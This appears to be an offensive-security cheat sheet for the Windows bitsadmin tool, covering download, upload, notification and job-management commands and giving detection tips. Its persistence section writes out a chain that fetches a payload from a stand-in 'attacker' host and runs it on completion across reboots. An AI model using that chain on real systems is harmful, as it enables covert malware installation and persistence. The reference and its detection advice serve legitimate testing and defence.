BITSADMIN
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: LOLBin / GTFOBins Browser
Background Intelligent Transfer Service (BITS) Administration. Used for file transfers; also commonly abused for downloads. NOTE: PowerShell cmdlets (Start-BitsTransfer) are preferred. BITS is often used by attackers due to its low profile.
BASIC OPERATIONS#
CREATE JOB#
bitsadmin /create jobname # Create download job bitsadmin /create /upload jobname # Create upload job bitsadmin /create /download jobname # Explicit download
ADD FILES#
bitsadmin /addfile jobname http://url/file.exe C:\dest\file.exe bitsadmin /addfile job http://url/file1.exe C:\file1.exe bitsadmin /addfile job http://url/file2.exe C:\file2.exe
CONTROL JOB#
bitsadmin /resume jobname # Start/resume transfer bitsadmin /suspend jobname # Pause transfer bitsadmin /complete jobname # Complete and save files bitsadmin /cancel jobname # Cancel and delete
MONITOR#
bitsadmin /list # List all jobs bitsadmin /list /allusers # All users' jobs bitsadmin /list /verbose # Detailed list bitsadmin /info jobname # Job info bitsadmin /info jobname /verbose # Detailed info bitsadmin /monitor # Real-time monitoring bitsadmin /monitor /allusers
QUICK FILE DOWNLOAD#
# One-liner download bitsadmin /transfer jobname http://url/file.exe C:\dest\file.exe # With priority bitsadmin /transfer job /priority high http://url/file.exe C:\file.exe # Download priority levels: FOREGROUND, HIGH, NORMAL, LOW
MULTI-FILE DOWNLOAD#
# Step by step bitsadmin /create downloadjob bitsadmin /addfile downloadjob http://url/file1.exe C:\file1.exe bitsadmin /addfile downloadjob http://url/file2.exe C:\file2.exe bitsadmin /resume downloadjob bitsadmin /complete downloadjob
JOB SETTINGS#
PRIORITY#
bitsadmin /setpriority jobname FOREGROUND bitsadmin /setpriority jobname HIGH bitsadmin /setpriority jobname NORMAL bitsadmin /setpriority jobname LOW
CREDENTIALS#
bitsadmin /setcredentials jobname SERVER BASIC user password bitsadmin /setcredentials jobname PROXY BASIC user password # Credential schemes: BASIC, DIGEST, NTLM, NEGOTIATE
PROXY#
bitsadmin /setproxysettings jobname OVERRIDE proxy:port bitsadmin /setproxysettings jobname NO_PROXY bitsadmin /setproxysettings jobname AUTODETECT
NOTIFICATIONS#
bitsadmin /setnotiycmdline jobname C:\script.bat "" bitsadmin /setnotifyflags jobname 1 # Job transferred bitsadmin /setnotifyflags jobname 2 # Job error bitsadmin /setnotifyflags jobname 3 # Both # On completion, run command bitsadmin /setnotifycmdline jobname cmd.exe "/c C:\script.bat"
CUSTOM HEADERS#
bitsadmin /setcustomheaders jobname "Header1: Value1" "Header2: Value2"
RETRY SETTINGS#
bitsadmin /setnoprogresstimeout jobname 60 bitsadmin /setminretrydelay jobname 300
JOB STATE#
QUEUED # Job created, not started CONNECTING # Connecting to server TRANSFERRING # Transfer in progress SUSPENDED # Paused ERROR # Error occurred TRANSIENT_ERROR # Temporary error TRANSFERRED # Complete, needs /complete ACKNOWLEDGED # Completed and saved CANCELLED # Cancelled
TROUBLESHOOTING#
bitsadmin /getstate jobname # Get job state bitsadmin /geterror jobname # Get error info bitsadmin /getbytestotal jobname # Total bytes bitsadmin /getbytestransferred jobname bitsadmin /getfilestotal jobname bitsadmin /getfilestransferred jobname
RESET#
bitsadmin /reset # Cancel all jobs bitsadmin /reset /allusers # All users' jobs
CACHE#
bitsadmin /cache /info # Cache info bitsadmin /cache /clear # Clear cache bitsadmin /peercaching /getconfigurationflags
UPLOAD#
bitsadmin /create /upload uploadjob bitsadmin /addfile uploadjob http://server/upload C:\local\file.exe bitsadmin /setreplyfilename uploadjob C:\response.txt bitsadmin /resume uploadjob
RAW DATA#
bitsadmin /rawreturn # Raw return data
SECURITY ANALYSIS#
# BITS is commonly used for:
# - Downloading malware (evades some detection)
# - Persistence via /setnotifycmdline
# - Data exfiltration via uploads
# - Command execution on completion
# Detection:
# - Monitor bitsadmin.exe execution
# - Check for unusual job names
# - Look for /transfer or /addfile to suspicious URLs
# - Check Event Logs: Microsoft-Windows-Bits-Client/Operational
# Find all BITS jobs
bitsadmin /list /allusers /verbose
# List jobs with file paths
for /f "tokens=3" %j in ('bitsadmin /list /allusers ^| findstr "GUID"') do @bitsadmin /info %j /verbose
PERSISTENCE TECHNIQUE#
# Create persistent download that runs command on completion bitsadmin /create persist bitsadmin /addfile persist http://attacker/payload.exe C:\Windows\Temp\payload.exe bitsadmin /setnotifycmdline persist C:\Windows\Temp\payload.exe "" bitsadmin /setminretrydelay persist 60 bitsadmin /resume persist # Job persists across reboots until completed
POWERSHELL ALTERNATIVE#
# Start-BitsTransfer is the modern alternative Start-BitsTransfer -Source http://url/file.exe -Destination C:\file.exe Start-BitsTransfer -Source http://url/file.exe -Destination C:\file.exe -Asynchronous Get-BitsTransfer # List jobs Complete-BitsTransfer -BitsJob $job # Complete job
QUICK REFERENCE#
# Quick download bitsadmin /transfer job http://url/file.exe C:\dest\file.exe # Multi-step download bitsadmin /create jobname bitsadmin /addfile jobname http://url/file.exe C:\file.exe bitsadmin /resume jobname bitsadmin /complete jobname # Monitor bitsadmin /list bitsadmin /info jobname /verbose bitsadmin /monitor # Control bitsadmin /resume jobname bitsadmin /suspend jobname bitsadmin /cancel jobname bitsadmin /complete jobname # Reset bitsadmin /reset /allusers